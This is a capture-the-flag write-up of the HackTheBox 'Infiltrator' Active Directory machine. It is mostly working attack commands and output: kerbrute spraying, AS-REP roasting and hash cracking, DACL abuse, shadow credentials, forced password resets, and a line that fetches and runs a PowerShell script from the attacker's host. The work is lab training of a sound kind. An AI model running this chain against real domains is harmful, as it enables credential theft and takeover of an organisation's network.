Infiltrator

Recon

└─$ grep infil /etc/hosts
10.129.146.214  infiltrator.htb dc01.infiltrator.htb    hostmaster.infiltrator.htb

DNS

└─$ dig ANY infiltrator.htb @10.10.11.31

; <<>> DiG 9.19.21-1-Debian <<>> ANY infiltrator.htb @10.10.11.31
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1593
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;infiltrator.htb.               IN      ANY

;; ANSWER SECTION:
infiltrator.htb.        600     IN      A       10.10.11.31
infiltrator.htb.        3600    IN      NS      dc01.infiltrator.htb.
infiltrator.htb.        3600    IN      SOA     dc01.infiltrator.htb. hostmaster.infiltrator.htb. 417 900 600 86400 3600

;; ADDITIONAL SECTION:
dc01.infiltrator.htb.   3600    IN      A       10.10.11.31

;; Query time: 84 msec
;; SERVER: 10.10.11.31#53(10.10.11.31) (TCP)
;; WHEN: Sat Aug 31 15:12:42 EDT 2024
;; MSG SIZE  rcvd: 142

HTTP (80)

Subdomain and directory enumeration came empty handed, the website is most likely just static website hosted on HTML. Search, email and contact wasn't working (most probably).

Kerberos

> document.querySelectorAll('.author-item h4').forEach(e=>console.log(e.textContent))
Amanda Walker
Marcus Harris
Lauren Clark
Ethan Rodriguez
David Anderson
Olivia Martinez
Kevin Turner
Amanda Walker
Marcus Harris
Lauren Clark
Ethan Rodriguez
David Anderson
Olivia Martinez
Kevin Turner
Amanda Walker

Kerbrute

namebuster was used to generate different combinations of usernames for AD.

└─$ namebuster usernames_web.txt > usernames.txt
└─$ kerbrute userenum ./usernames.txt -d infiltrator.htb --dc dc01.infiltrator.htb

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (n/a) - 08/31/24 - Ronnie Flathers @ropnop

2024/08/31 15:50:56 >  Using KDC(s):
2024/08/31 15:50:56 >   dc01.infiltrator.htb:88

2024/08/31 15:50:57 >  [+] VALID USERNAME:       a.walker@infiltrator.htb
2024/08/31 15:50:57 >  [+] VALID USERNAME:       a.WALKER@infiltrator.htb
2024/08/31 15:50:57 >  [+] VALID USERNAME:       a.Walker@infiltrator.htb
2024/08/31 15:50:57 >  [+] VALID USERNAME:       A.walker@infiltrator.htb
2024/08/31 15:50:57 >  [+] VALID USERNAME:       A.Walker@infiltrator.htb
2024/08/31 15:50:57 >  [+] VALID USERNAME:       A.WALKER@infiltrator.htb
2024/08/31 15:50:59 >  [+] VALID USERNAME:       m.harris@infiltrator.htb
2024/08/31 15:50:59 >  [+] VALID USERNAME:       m.Harris@infiltrator.htb
2024/08/31 15:50:59 >  [+] VALID USERNAME:       m.HARRIS@infiltrator.htb
2024/08/31 15:50:59 >  [+] VALID USERNAME:       M.harris@infiltrator.htb
2024/08/31 15:50:59 >  [+] VALID USERNAME:       M.HARRIS@infiltrator.htb
2024/08/31 15:50:59 >  [+] VALID USERNAME:       M.Harris@infiltrator.htb
2024/08/31 15:51:01 >  [+] VALID USERNAME:       l.clark@infiltrator.htb
2024/08/31 15:51:01 >  [+] VALID USERNAME:       l.CLARK@infiltrator.htb
2024/08/31 15:51:01 >  [+] VALID USERNAME:       l.Clark@infiltrator.htb
2024/08/31 15:51:01 >  [+] VALID USERNAME:       L.Clark@infiltrator.htb
2024/08/31 15:51:01 >  [+] VALID USERNAME:       L.clark@infiltrator.htb
2024/08/31 15:51:01 >  [+] VALID USERNAME:       L.CLARK@infiltrator.htb
2024/08/31 15:51:02 >  [+] VALID USERNAME:       e.rodriguez@infiltrator.htb
2024/08/31 15:51:02 >  [+] VALID USERNAME:       e.Rodriguez@infiltrator.htb
2024/08/31 15:51:02 >  [+] VALID USERNAME:       e.RODRIGUEZ@infiltrator.htb
2024/08/31 15:51:02 >  [+] VALID USERNAME:       E.rodriguez@infiltrator.htb
2024/08/31 15:51:02 >  [+] VALID USERNAME:       E.Rodriguez@infiltrator.htb
2024/08/31 15:51:02 >  [+] VALID USERNAME:       E.RODRIGUEZ@infiltrator.htb
2024/08/31 15:51:04 >  [+] VALID USERNAME:       d.anderson@infiltrator.htb
2024/08/31 15:51:04 >  [+] VALID USERNAME:       d.Anderson@infiltrator.htb
2024/08/31 15:51:04 >  [+] VALID USERNAME:       d.ANDERSON@infiltrator.htb
2024/08/31 15:51:04 >  [+] VALID USERNAME:       D.anderson@infiltrator.htb
2024/08/31 15:51:04 >  [+] VALID USERNAME:       D.Anderson@infiltrator.htb
2024/08/31 15:51:04 >  [+] VALID USERNAME:       D.ANDERSON@infiltrator.htb
2024/08/31 15:51:06 >  [+] VALID USERNAME:       o.martinez@infiltrator.htb
2024/08/31 15:51:06 >  [+] VALID USERNAME:       o.Martinez@infiltrator.htb
2024/08/31 15:51:06 >  [+] VALID USERNAME:       o.MARTINEZ@infiltrator.htb
2024/08/31 15:51:06 >  [+] VALID USERNAME:       O.martinez@infiltrator.htb
2024/08/31 15:51:06 >  [+] VALID USERNAME:       O.Martinez@infiltrator.htb
2024/08/31 15:51:06 >  [+] VALID USERNAME:       O.MARTINEZ@infiltrator.htb
2024/08/31 15:51:09 >  [+] VALID USERNAME:       K.turner@infiltrator.htb
2024/08/31 15:51:09 >  [+] VALID USERNAME:       K.Turner@infiltrator.htb
2024/08/31 15:51:09 >  [+] VALID USERNAME:       K.TURNER@infiltrator.htb
2024/08/31 15:51:12 >  [+] VALID USERNAME:       k.turner@infiltrator.htb
2024/08/31 15:51:12 >  [+] VALID USERNAME:       k.Turner@infiltrator.htb
2024/08/31 15:51:12 >  [+] VALID USERNAME:       k.TURNER@infiltrator.htb
2024/08/31 15:51:13 >  Done! Tested 1512 usernames (42 valid) in 17.095 seconds
---
a.walker@infiltrator.htb
m.harris@infiltrator.htb
l.clark@infiltrator.htb
e.rodriguez@infiltrator.htb
d.anderson@infiltrator.htb
o.martinez@infiltrator.htb
k.turner@infiltrator.htb

AS-REP

Something interesting happens if we try to password spray!

└─$ kerbrute -v passwordspray ./usernames_unique.txt letmein -d infiltrator.htb --dc dc01.infiltrator.htb
Version: dev (n/a) - 08/31/24 - Ronnie Flathers @ropnop

2024/08/31 16:14:04 >  Using KDC(s):
2024/08/31 16:14:04 >   dc01.infiltrator.htb:88

2024/08/31 16:14:04 >  [!] "" - Bad username: blank
2024/08/31 16:14:04 >  [!] e.rodriguez@infiltrator.htb:letmein - Invalid password
2024/08/31 16:14:04 >  [!] a.walker@infiltrator.htb:letmein - Invalid password
2024/08/31 16:14:04 >  [!] k.turner@infiltrator.htb:letmein - Invalid password
2024/08/31 16:14:04 >  [!] o.martinez@infiltrator.htb:letmein - Invalid password
2024/08/31 16:14:04 >  [!] d.anderson@infiltrator.htb:letmein - Invalid password
2024/08/31 16:14:04 >  [!] m.harris@infiltrator.htb:letmein - Invalid password
2024/08/31 16:14:04 >  [!] l.clark@infiltrator.htb:letmein - Got AS-REP (no pre-auth) but couldn't decrypt - bad password
2024/08/31 16:14:04 >  Done! Tested 7 logins (0 successes) in 0.310 seconds

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast

Get the hashes

└─$ impacket-GetNPUsers infiltrator.htb/ -usersfile usernames_unique.txt -format hashcat -outputfile hashes.asreproast
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
...
$krb5asrep$23$l.clark@infiltrator.htb@INFILTRATOR.HTB:8024f9fd9e37b42ef8903235c8742d9c$e66a1249473ce462b90c7fe5b5da7626eaa5c71ac8983cb9b2ccaea11c818a9ea190fea5561ae3929bd590619512acb45cec1c96fec31650e32a05b1f172be0a91e9abeeff7731494f7f8f4df05e7ccb5e054b7d6701f6bb83fa6e8f7347493e33f8e28d268634795466fc3183f99c4699b1c9c4a504fb688bed125cf5e4cfc7aa4739a543c4b46874ee525301bf92120ceac08b900dd141740946fba507ae5d285499e301ca5b1dea9809aa653bf4ee26bcf0ffd5b11513e709b3070f41cb9c66324eb172eebd37ee56bced6531d3146a0c0d8387b7f42725cbe17804ef8747b7d7d8899bc4e3e9b5ceb869ecdd3b8f8845
...

Crack available hash

➜ .\hashcat.exe -m 18200 -a 0 .\hashes .\rockyou.txt
hashcat (v6.2.6) starting
...
$krb5asrep$23$l.clark@infiltrator.htb@INFILTRATOR.HTB:8024f9fd9e37b42e...ecdd3b8f8845:WAT?watismypass!

Creds: l.clark:WAT?watismypass!

SMB

Perform RID brute just to be safe that we covered all users, evil-winrm didn't work.

└─$ netexec smb 10.10.11.31 -u 'l.clark' -p 'WAT?watismypass!' --shares --rid-brute
SMB         10.10.11.31     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.31     445    DC01             [+] infiltrator.htb\l.clark:WAT?watismypass!
SMB         10.10.11.31     445    DC01             [*] Enumerated shares
SMB         10.10.11.31     445    DC01             Share           Permissions     Remark
SMB         10.10.11.31     445    DC01             -----           -----------     ------
SMB         10.10.11.31     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.31     445    DC01             C$                              Default share
SMB         10.10.11.31     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.31     445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.11.31     445    DC01             SYSVOL          READ            Logon server share
SMB         10.10.11.31     445    DC01             498: INFILTRATOR\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.31     445    DC01             500: INFILTRATOR\Administrator (SidTypeUser)
SMB         10.10.11.31     445    DC01             501: INFILTRATOR\Guest (SidTypeUser)
SMB         10.10.11.31     445    DC01             502: INFILTRATOR\krbtgt (SidTypeUser)
SMB         10.10.11.31     445    DC01             512: INFILTRATOR\Domain Admins (SidTypeGroup)
SMB         10.10.11.31     445    DC01             513: INFILTRATOR\Domain Users (SidTypeGroup)
SMB         10.10.11.31     445    DC01             514: INFILTRATOR\Domain Guests (SidTypeGroup)
SMB         10.10.11.31     445    DC01             515: INFILTRATOR\Domain Computers (SidTypeGroup)
SMB         10.10.11.31     445    DC01             516: INFILTRATOR\Domain Controllers (SidTypeGroup)
SMB         10.10.11.31     445    DC01             517: INFILTRATOR\Cert Publishers (SidTypeAlias)
SMB         10.10.11.31     445    DC01             518: INFILTRATOR\Schema Admins (SidTypeGroup)
SMB         10.10.11.31     445    DC01             519: INFILTRATOR\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.31     445    DC01             520: INFILTRATOR\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.31     445    DC01             521: INFILTRATOR\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.31     445    DC01             522: INFILTRATOR\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.31     445    DC01             525: INFILTRATOR\Protected Users (SidTypeGroup)
SMB         10.10.11.31     445    DC01             526: INFILTRATOR\Key Admins (SidTypeGroup)
SMB         10.10.11.31     445    DC01             527: INFILTRATOR\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.31     445    DC01             553: INFILTRATOR\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.31     445    DC01             571: INFILTRATOR\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.31     445    DC01             572: INFILTRATOR\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.31     445    DC01             1000: INFILTRATOR\DC01$ (SidTypeUser)
SMB         10.10.11.31     445    DC01             1101: INFILTRATOR\DnsAdmins (SidTypeAlias)
SMB         10.10.11.31     445    DC01             1102: INFILTRATOR\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.31     445    DC01             1103: INFILTRATOR\D.anderson (SidTypeUser)
SMB         10.10.11.31     445    DC01             1104: INFILTRATOR\L.clark (SidTypeUser)
SMB         10.10.11.31     445    DC01             1105: INFILTRATOR\M.harris (SidTypeUser)
SMB         10.10.11.31     445    DC01             1106: INFILTRATOR\O.martinez (SidTypeUser)
SMB         10.10.11.31     445    DC01             1107: INFILTRATOR\A.walker (SidTypeUser)
SMB         10.10.11.31     445    DC01             1108: INFILTRATOR\K.turner (SidTypeUser)
SMB         10.10.11.31     445    DC01             1109: INFILTRATOR\E.rodriguez (SidTypeUser)
SMB         10.10.11.31     445    DC01             1111: INFILTRATOR\Chiefs Marketing (SidTypeGroup)
SMB         10.10.11.31     445    DC01             1112: INFILTRATOR\Developers (SidTypeGroup)
SMB         10.10.11.31     445    DC01             1113: INFILTRATOR\Digital_Influencers (SidTypeGroup)
SMB         10.10.11.31     445    DC01             1114: INFILTRATOR\Infiltrator_QA (SidTypeGroup)
SMB         10.10.11.31     445    DC01             1115: INFILTRATOR\Marketing_Team (SidTypeGroup)
SMB         10.10.11.31     445    DC01             1116: INFILTRATOR\Service_Management (SidTypeGroup)
SMB         10.10.11.31     445    DC01             1601: INFILTRATOR\winrm_svc (SidTypeUser)
SMB         10.10.11.31     445    DC01             3102: INFILTRATOR\infiltrator_svc$ (SidTypeUser)

LDAP

└─$ netexec ldap 10.10.11.31 -u 'l.clark' -p 'WAT?watismypass!' --active-users
SMB         10.10.11.31     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.31     389    DC01             [+] infiltrator.htb\l.clark:WAT?watismypass!
LDAP        10.10.11.31     389    DC01             [*] Total records returned: 10, total 2 user(s) disabled
LDAP        10.10.11.31     389    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-
LDAP        10.10.11.31     389    DC01             Administrator                 2024-08-21 19:58:28 0       Built-in account for administering the computer/domain
LDAP        10.10.11.31     389    DC01             D.anderson                    2023-12-04 18:56:02 4
LDAP        10.10.11.31     389    DC01             L.clark                       2023-12-04 19:04:24 0
LDAP        10.10.11.31     389    DC01             M.harris                      2024-08-31 20:41:44 4
LDAP        10.10.11.31     389    DC01             O.martinez                    2024-02-25 15:41:03 0
LDAP        10.10.11.31     389    DC01             A.walker                      2023-12-05 22:06:28 4
LDAP        10.10.11.31     389    DC01             K.turner                      2024-02-25 15:40:35 10      MessengerApp@Pass!
LDAP        10.10.11.31     389    DC01             E.rodriguez                   2024-08-31 20:41:44 4
LDAP        10.10.11.31     389    DC01             winrm_svc                     2024-08-02 22:42:45 4
LDAP        10.10.11.31     389    DC01             lan_managment                 2024-08-02 22:42:46 4

Creds: K.turner:MessengerApp@Pass!

For ???, doesn't work for smb!

└─$ netexec ldap 10.10.11.31 -u 'l.clark' -p 'WAT?watismypass!'  -M get-desc-users
SMB         10.10.11.31     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.31     389    DC01             [+] infiltrator.htb\l.clark:WAT?watismypass!
GET-DESC... 10.10.11.31     389    DC01             [+] Found following users:
GET-DESC... 10.10.11.31     389    DC01             User: Administrator description: Built-in account for administering the computer/domain
GET-DESC... 10.10.11.31     389    DC01             User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.10.11.31     389    DC01             User: krbtgt description: Key Distribution Center Service Account
GET-DESC... 10.10.11.31     389    DC01             User: K.turner description: MessengerApp@Pass!
GET-DESC... 10.10.11.31     389    DC01             User: infiltrator_svc$ description: dc01.infiltrator.htb

Also very useful command:

└─$ ldapdomaindump -u 'infiltrator.htb\l.clark' -p 'WAT?watismypass!' 10.10.11.31

Bloodhound

└─$ bloodhound-python -u 'l.clark@infiltrator.htb' -p 'WAT?watismypass!' -ns 10.10.11.31 -dc dc01.infiltrator.htb -d infiltrator.htb -c all --zip

Clark doesn't have anything interesting, but the group he belongs to has another user.

D.anderson.ccache

We are able to forge kerberos tickets and not only ours.

└─$ for username in $(<usernames_rid_brute.txt); do impacket-getTGT "infiltrator.htb/$username:WAT?watismypass\!" -dc-ip 10.10.11.31; done;
...
[*] Saving ticket in D.anderson.ccache
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Saving ticket in L.clark.ccache
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
...

└─$ export KRB5CCNAME=./kerberos/ccaches/D.anderson.ccache
└─$ klist
Ticket cache: FILE:./kerberos/ccaches/D.anderson.ccache
Default principal: D.anderson@INFILTRATOR.HTB

Valid starting       Expires              Service principal
09/01/2024 02:07:17  09/01/2024 06:07:17  krbtgt/INFILTRATOR.HTB@INFILTRATOR.HTB
        renew until 09/01/2024 06:07:17

Chain of attack

After following the Outbound permissions on each connection we end up with a chain like:

dacledit

└─$ git clone https://github.com/fortra/impacket.git
└─$ venv
└─$ pip install -r requirements.txt
└─$ pip install -e .
└─$ py examples/dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'l.clark' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' -k -no-pass -dc-ip 10.10.11.31 infiltrator.htb/d.anderson
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20240901-032305.bak
[*] DACL modified successfully!

Now chain becomes like:

pywhisker && certipy-ad

Same steps from Mist box.

└─$ pywhisker -d infiltrator.htb -u l.clark -p 'WAT?watismypass!' --target 'E.rodriguez' --action add
[*] Searching for the target account
[*] Target user found: CN=E.rodriguez,OU=Marketing Digital,DC=infiltrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 391786dd-eb48-a551-526b-8f5d55b3bebe
[*] Updating the msDS-KeyCredentialLink attribute of E.rodriguez
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: MR9B48eC.pfx
[*] Must be used with password: gc0BUPDvvbNmvrOaaDur
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
└─$ certipy-ad cert -pfx ./MR9B48eC.pfx -password 'gc0BUPDvvbNmvrOaaDur' -export -out rodriguez.pfx -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Loading PFX './MR9B48eC.pfx' with password None
[*] Writing PFX to 'rodriguez.pfx'
└─$ certipy-ad auth -pfx ./rodriguez.pfx -username 'E.rodriguez' -domain infiltrator.htb -dc-ip 10.10.11.31
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: e.rodriguez@infiltrator.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'e.rodriguez.ccache'
[*] Trying to retrieve NT hash for 'e.rodriguez'
[*] Got hash for 'e.rodriguez@infiltrator.htb': aad3b435b51404eeaad3b435b51404ee:b02e97f2fdb5c3d36f77375383449e56
└─$ netexec smb 10.10.11.31 -u 'e.rodriguez' -H 'b02e97f2fdb5c3d36f77375383449e56'
SMB         10.10.11.31     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.31     445    DC01             [+] infiltrator.htb\e.rodriguez:b02e97f2fdb5c3d36f77375383449e56

AddSelf

AddSelf, similar to AddMember. While AddMember is WriteProperty access right on the target's Member attribute, AddSelf is a Self access right on the target's Member attribute, allowing the attacker to add itself to the target group, instead of adding arbitrary principals. src

https://www.thehacker.recipes/ad/movement/dacl/addmember

# bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add groupMember "$TargetGroup" "$TargetUser"
└─$ bloodyAD --host "dc01.infiltrator.htb" -d "infiltrator.htb" -u "E.rodriguez" -p ":b02e97f2fdb5c3d36f77375383449e56" add groupMember "CHIEFS MARKETING" "e.rodriguez"
[+] e.rodriguez added to CHIEFS MARKETING

ForceChangePassword

https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword

# bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password "$TargetUser" "$NewPassword"
└─$ bloodyAD --host "dc01.infiltrator.htb" -d "infiltrator.htb" -u "E.rodriguez" -p ":b02e97f2fdb5c3d36f77375383449e56" set password "m.harris" "Password123$"
[+] Password changed successfully!

M.harris.ccache

└─$ impacket-getTGT "infiltrator.htb/M.harris:Password123$" -dc-ip 10.129.211.98
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Saving ticket in M.harris.ccache
└─$ export KRB5CCNAME=./kerberos/ccaches/M.harris.ccache

Due to some error in HTB infrastructure the commands had to be executed quickly.....

bloodyAD --host "dc01.infiltrator.htb" -d "infiltrator.htb" -u "e.rodriguez" -p ":b02e97f2fdb5c3d36f77375383449e56" add groupMember "CHIEFS MARKETING" "e.rodriguez"
bloodyAD --host "dc01.infiltrator.htb" -d "infiltrator.htb" -u "e.rodriguez" -p ":b02e97f2fdb5c3d36f77375383449e56" set password "m.harris" "Password123$"
impacket-getTGT "infiltrator.htb/M.harris:Password123$"
mv M.harris.ccache kerberos/ccaches/
export KRB5CCNAME=$(readlink -f ./kerberos/ccaches/M.harris.ccache)
evil-winrm -i dc01.infiltrator.htb -r infiltrator.htb

Note: If you get Cannot find KDC for realm "INFILTRATOR.HTB", you may need to update /etc/resolv.conf with box IP (first entry) or /etc/kerb5.conf

evil-winrm (m.harris)

*Evil-WinRM* PS C:\Users\M.harris> tree /f /a
Folder PATH listing
Volume serial number is 96C7-B603
C:.
+---Desktop
|       user.txt

User.txt

*Evil-WinRM* PS C:\Users\M.harris> cat Desktop/user.txt
8ac3296d7416bbe06c637e022103d00e

Privilege Escalation

Internal AD Enumeration

└─$ bloodhound-python -u 'm.harris@infiltrator.htb' -k -no-pass -dc dc01.infiltrator.htb -d infiltrator.htb -c all --zip -op harris
Password: # Enter anything, idk why it prompts password with `-no-pass`

harris doesn't have any outbound permissions.

evil-winrm was very unstable for some reason, so I switched to ConPtyShell.

PS C:\users> whoami /all
User Name            SID
==================== ==============================================
infiltrator\m.harris S-1-5-21-2606098828-3734741516-3625406802-1105

Group Name                                  Type             SID                                            Attributes
=========================================== ================ ============================================== ==================================================
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
INFILTRATOR\Protected Users                 Group            S-1-5-21-2606098828-3734741516-3625406802-525  Mandatory group, Enabled by default, Enabled group
INFILTRATOR\Developers                      Group            S-1-5-21-2606098828-3734741516-3625406802-1112 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity  Well-known group S-1-18-1                                       Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Enumerate with winPeas

PS C:\users\M.harris\Music> iwr 10.10.14.43/wp.exe -out wp.exe
PS C:\users\M.harris\Music> .\wp.exe | Tee-Object -FilePath wp.log
...
+----------¦ PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.17763.1
    PowerShell Core Version:
    Transcription Settings:
    Module Logging Settings:
    Scriptblock Logging Settings:
    PS history file: C:\Users\M.harris\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    PS history size: 192B
...
+----------¦ Drives Information
+ Remember that you should search more info inside the other drives
    C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 43 GB)(Permissions: Users [AppendData/CreateDirectories])
    E:\ (Type: Fixed)
...
+----------¦ Checking KrbRelayUp
+  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
  The system is inside a domain (INFILTRATOR) so it could be vulnerable.
+ You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges
...

    Folder: C:\windows\tasks
    FolderPerms: Authenticated Users [WriteData/CreateFiles]
   =================================================================================================


    Folder: C:\windows\system32\tasks
    FolderPerms: Authenticated Users [WriteData/CreateFiles]
   =================================================================================================
...
+  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
    C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml
...
+----------¦ Enumerating machine and user certificate files

  Issuer             : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
  Subject            :
  ValidDate          : 8/4/2024 11:48:15 AM
  ExpiryDate         : 7/17/2099 11:48:15 AM
  HasPrivateKey      : True
  StoreLocation      : LocalMachine
  KeyExportable      : True
  Thumbprint         : ABFD279830AC7B08DE25677B654BB7047D01F071

  Template           : Template=Kerberos Authentication(1.3.6.1.4.1.311.21.8.8884114.8852024.1722030.16302680.8225111.115.1.33), Major Version Number=110, Minor Version Number=2
  Enhanced Key Usages
       Client Authentication     [*] Certificate is used for client authentication!
       Server Authentication
       Smart Card Logon
       KDC Authentication
   =================================================================================================

  Issuer             : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
  Subject            : CN=dc01.infiltrator.htb
  ValidDate          : 12/7/2023 5:45:12 PM
  ExpiryDate         : 12/6/2024 5:45:12 PM
  HasPrivateKey      : True
  StoreLocation      : LocalMachine
  KeyExportable      : True
  Thumbprint         : 31154FCF64FBACACED5DEC9910EB0D1BB50F1F2C

  Template           : DomainController
  Enhanced Key Usages
       Client Authentication     [*] Certificate is used for client authentication!
       Server Authentication
   =================================================================================================

  Issuer             : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
  Subject            : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
  ValidDate          : 12/7/2023 5:42:38 PM
  ExpiryDate         : 12/7/2028 5:52:38 PM
  HasPrivateKey      : True
  StoreLocation      : LocalMachine
  KeyExportable      : True
  Thumbprint         : 2C188207AE9DE454750081FACE0CFE730EAFAB65

   =================================================================================================

  Issuer             : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
  Subject            : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
  ValidDate          : 12/7/2023 5:42:38 PM
  ExpiryDate         : 8/4/2124 11:55:57 AM
  HasPrivateKey      : True
  StoreLocation      : LocalMachine
  KeyExportable      : True
  Thumbprint         : 04A961BA417C7829B307CFBD46B2FB486BFD86C1

   =================================================================================================
...
+----------¦ Searching hidden files or folders in C:\Users home (can be slow)

     C:\Users\Default
     C:\Users\All Users
     C:\Users\All Users\ntuser.pol
     C:\Users\Default User
     C:\Users\Default
...

PS C:\users\M.harris\Music> IEX(IWR 10.10.14.43/adPEAS.ps1 -UseBasicParsing)
PS C:\users\M.harris\Music> Invoke-adPEAS
...
[?] +++++ Checking Add-Computer Permissions +++++
[+] Filtering found identities that can add a computer object to domain 'infiltrator.htb':
[!] The Machine Account Quota is currently set to 10
[!] Every member of group 'Authenticated Users' can add a computer to domain 'infiltrator.htb'

distinguishedName:                      CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=infiltrator,DC=htb
objectSid:                              S-1-5-11
memberOf:                               CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=infiltrator,DC=htb
                                        CN=Certificate Service DCOM Access,CN=Builtin,DC=infiltrator,DC=htb
                                        CN=Users,CN=Builtin,DC=infiltrator,DC=htb   
...
[+] Found Active Directory Certificate Services 'infiltrator-DC01-CA':
CA Name:                                infiltrator-DC01-CA
CA dnshostname:                         dc01.infiltrator.htb
CA IP Address:                          10.129.211.98
Date of Creation:                       12/08/2023 01:52:38
DistinguishedName:                      CN=infiltrator-DC01-CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=infiltrator,DC=htb
NTAuthCertificates:                     True
Available Templates:                    Infiltrator_Template
                                        DirectoryEmailReplication
                                        DomainControllerAuthentication
                                        KerberosAuthentication
                                        EFSRecovery
                                        EFS
                                        DomainController
                                        WebServer
                                        Machine
                                        User
                                        SubCA
                                        Administrator
...
[?] +++++ Checking Template 'Infiltrator_Template' +++++
[!] Template 'Infiltrator_Template' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
[!] Identity 'INFILTRATOR\infiltrator_svc$' has 'CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner' permissions on template 'Infiltrator_Template'
[!] Identity 'Local System' has 'GenericAll' permissions on template 'Infiltrator_Template'
Template Name:                          Infiltrator_Template
Template distinguishedname:             CN=Infiltrator_Template,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=infiltrator,DC=htb
Date of Creation:                       09/01/2024 20:49:56
[+] Extended Key Usage:                 Smartcard Logon, Server Authentication, KDC Authentication, Client Authentication
EnrollmentFlag:                         INCLUDE_SYMMETRIC_ALGORITHMS, PEND_ALL_REQUESTS, PUBLISH_TO_DS
[!] CertificateNameFlag:                ENROLLEE_SUPPLIES_SUBJECT
[!] Template Permissions:               Local System : GenericAll
